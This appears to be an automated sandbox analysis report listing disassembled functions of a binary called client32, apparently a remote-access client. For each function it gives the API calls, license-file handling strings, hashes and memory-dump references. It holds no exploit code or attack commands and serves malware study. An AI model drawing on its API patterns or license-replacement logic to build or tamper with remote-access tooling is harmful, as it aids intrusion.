                                                                                                                                                                                                    • Instruction ID: ee076e1b1c12c59e2fd2c34d2ca2faed304bf4b043a58102cf48aae30fabbc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43C17BB53041199FD748CE69E890E7FB3EAFBC8311B10466EF956C7781DA21AC118BB1
                                                                                                                                                                                                    Function 1101F360 Relevance: 15.1, APIs: 10, Instructions: 54clipboardmemorywindowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 1101F387
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F397
                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 1101F3A0
                                                                                                                                                                                                    • _memmove.LIBCMT ref: 1101F3A9
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 1101F3B2
                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 1101F3B8
                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 1101F3C1
                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 1101F3CC
                                                                                                                                                                                                    • MessageBeep.USER32(00000030), ref: 1101F3D4
                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 1101F3DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock_memmove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3255624709-0
                                                                                                                                                                                                    • Opcode ID: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
                                                                                                                                                                                                    • Instruction ID: a74b028ba7232528d54cbd7924e13de8c44cceb4ce50299c474c183637a6b5bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e34d2ed037c0cc0ce93fd965415a0307a16a5f75420eb2469a8d43960e23cf46
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67019276A012636BD3026B748CCCE5FBBACDF55349704C079F626C6109EB74C8058762
                                                                                                                                                                                                    Function 111575D0 Relevance: 10.6, APIs: 7, Instructions: 105windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 11157677
                                                                                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 11157687
                                                                                                                                                                                                    • BringWindowToTop.USER32(?), ref: 11157691
                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 111576D0
                                                                                                                                                                                                    • IsIconic.USER32(00000000), ref: 111576DB
                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000009), ref: 111576E8
                                                                                                                                                                                                    • BringWindowToTop.USER32(00000000), ref: 111576EF
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$BringIconicShow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2588442158-0
                                                                                                                                                                                                    • Opcode ID: 038ff0c7e592a338b47f23a8c12551223a3be2bd5e1829126b81d4076912602b
                                                                                                                                                                                                    • Instruction ID: a9c9b89abb11ca8be4b118751fbd9485df176094a83bcf99db43cce38e22dc7e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 038ff0c7e592a338b47f23a8c12551223a3be2bd5e1829126b81d4076912602b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D431E575A00A2A9FD751CF54D985BAEF7B8FF45714F00816AE921E3380EB35A901CFA1
                                                                                                                                                                                                    Function 687E0807 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6885C224
                                                                                                                                                                                                    • _crt_debugger_hook.MSVCR100(00000001), ref: 6885C231
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6885C239
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(6885C270), ref: 6885C244
                                                                                                                                                                                                    • _crt_debugger_hook.MSVCR100(00000001), ref: 6885C255
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 6885C260
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 6885C267
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3369434319-0
                                                                                                                                                                                                    • Opcode ID: 78bd99e24d1df68432f8adfde306c0eb0bf8fef7beb17e730f44dedcae534051
                                                                                                                                                                                                    • Instruction ID: b70402e0b7db25f358a7d0cff23d07dc08402f251128e2e16c7c560bbf75bc3a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78bd99e24d1df68432f8adfde306c0eb0bf8fef7beb17e730f44dedcae534051
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B21C9F8981244CFDBA0DF6CD588A8C7BA4BB0B310F50086AE52D82641E7B06984CF96
                                                                                                                                                                                                    Function 6882CA9B Relevance: 7.5, APIs: 5, Instructions: 47fileCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc_crt.MSVCR100(00000354,?,?,6882CBA0,?,00000000,-00000002,68885BD0), ref: 6882CAB5
                                                                                                                                                                                                      • Part of subcall function 687E0B31: malloc.MSVCR100(00000001,00000001,00000001,?,687EA974,00000018,687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 687E0B3D
                                                                                                                                                                                                    • FindClose.KERNEL32(?,?,?,6882CBA0,?,00000000,-00000002,68885BD0), ref: 6882CAD2
                                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(-00000002,00000000,00000000,00000000,00000000,?,?,6882CBA0,?,00000000,-00000002,68885BD0), ref: 6882CAEB
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,6882CBA0,?,00000000,-00000002,68885BD0), ref: 6882CB12
                                                                                                                                                                                                    • FindClose.KERNEL32(?,6882CBA0,?,00000000,-00000002,68885BD0), ref: 6882CB22
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Find$CloseFile$FirstNext_malloc_crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1203757345-0
                                                                                                                                                                                                    • Opcode ID: 92cbabc2f9a1ef4587d4b5e7ae3efdeff82cc2badaa52c79f495b87752d46744
                                                                                                                                                                                                    • Instruction ID: f759d614d62cc3dc2bd2e9ba2d963b178aad4b34b066dec83d134058d813da76
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cbabc2f9a1ef4587d4b5e7ae3efdeff82cc2badaa52c79f495b87752d46744
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C019AF1189562EFCF11AF29CE288AE3EAAFB0B7A03504825F42DD1551C330C181CBE0
                                                                                                                                                                                                    Function 1101D180 Relevance: 4.6, APIs: 3, Instructions: 82timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __time64.LIBCMT ref: 1101D213
                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 1101D232
                                                                                                                                                                                                    • GetLocalTime.KERNEL32(00000002), ref: 1101D25C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LocalRectTime__time64
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 394334608-0
                                                                                                                                                                                                    • Opcode ID: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                                                                                    • Instruction ID: 290189b485d165d605b85d0a399bd35ca550a15b876ac08f977e3d1591b43d19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: de18328b6b15506cedc7e23451f66c7985023e4612589437c270b1aaafaaec95
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01316C75904B44DFD320CF68D944B9AFBE8EB48714F00896EE86AC7780DB34E904CB51
                                                                                                                                                                                                    Function 11059270 Relevance: 4.5, APIs: 3, Instructions: 19windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 11059281
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,?,?,1105990A,DuplicateHandle), ref: 1105928F
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,1105990A,DuplicateHandle), ref: 11059299
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1365068426-0
                                                                                                                                                                                                    • Opcode ID: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
                                                                                                                                                                                                    • Instruction ID: 5b7cf9c0659eada95368eb5e30aa7fe70508538aa6eda4fa9add4fab25305eb2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2D05E79684308BBE2159BD0CC4AFADB7ACD70CB16F200166FB01961C0DAB169008B76
                                                                                                                                                                                                    Function 110A9240 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,002A400C,00000000,00000000,00000000,00000000,11030FDE,00000000), ref: 110A9260
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ControlDevice
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2352790924-0
                                                                                                                                                                                                    • Opcode ID: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
                                                                                                                                                                                                    • Instruction ID: e696868f72d0725410e46aa1b0c9657244e5a899ecae170b9f1eee7695916dac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5E0CDF5A0820CBFA304DEF99CC1C6BB79CD5063687100399F629C3141E5719D109770
                                                                                                                                                                                                    Function 1102B546 Relevance: 70.5, APIs: 7, Strings: 33, Instructions: 485COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1102B5F5
                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,nsm,00000000,?), ref: 1102B658
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileNameTempwsprintf
                                                                                                                                                                                                    • String ID: %snsm.%s.%02d.lic$*** Activate new license file in registy, key [%s]$*** Copied and read new license file$*** Copy enforce section for config %x$*** Set eval flags failed, error [%d]$*** Set eval flags registy, key [%s]$*** product after copy %d$*** product before copy %d$305090$HasEval$IsA()$Portable Tech Console\nsm.lic$Portable Tutor\nsm.lic$Product$ReplaceLicFile : Attempt to rename %s to %s$ReplaceLicFile : License error %d reading %s$ReplaceLicFile : Load new license file$ReplaceLicFile : New checksum and disk checksum don't match so we write file$ReplaceLicFile : Read license file$ReplaceLicFile : Rename current license file to %s$ReplaceLicFile : Revert to previous license$ReplaceLicFile : Status after config test %d - lic error %d$ReplaceLicFile : Status after renames %d - error %d$ReplaceLicFile : Written file %s, read into temporary config$ReplaceLicFile : bWriteFile = %d, LoadLicense = %d$ReplaceLicFile : flags & 2 - just reread the license details$V12.10.4$_License$_checksum$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$nsm$product$z:
                                                                                                                                                                                                    • API String ID: 2029944419-3968474935
                                                                                                                                                                                                    • Opcode ID: 174ab10ef622b4b4a599600fe98865488f638ae1b667fd0395751504558a5437
                                                                                                                                                                                                    • Instruction ID: ea34cc8c2541377923297bd1bd1432500824a42ecbb912290de042532a9e56a7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 174ab10ef622b4b4a599600fe98865488f638ae1b667fd0395751504558a5437
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14020575E0062A6BDB20DBA4CC40FEEF379AF84708F5441D5E919A7181EB716B84CFA1
                                                                                                                                                                                                    Function 1102B56B Relevance: 56.4, APIs: 5, Strings: 27, Instructions: 352COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1102B5F5
                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,nsm,00000000,?), ref: 1102B658
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
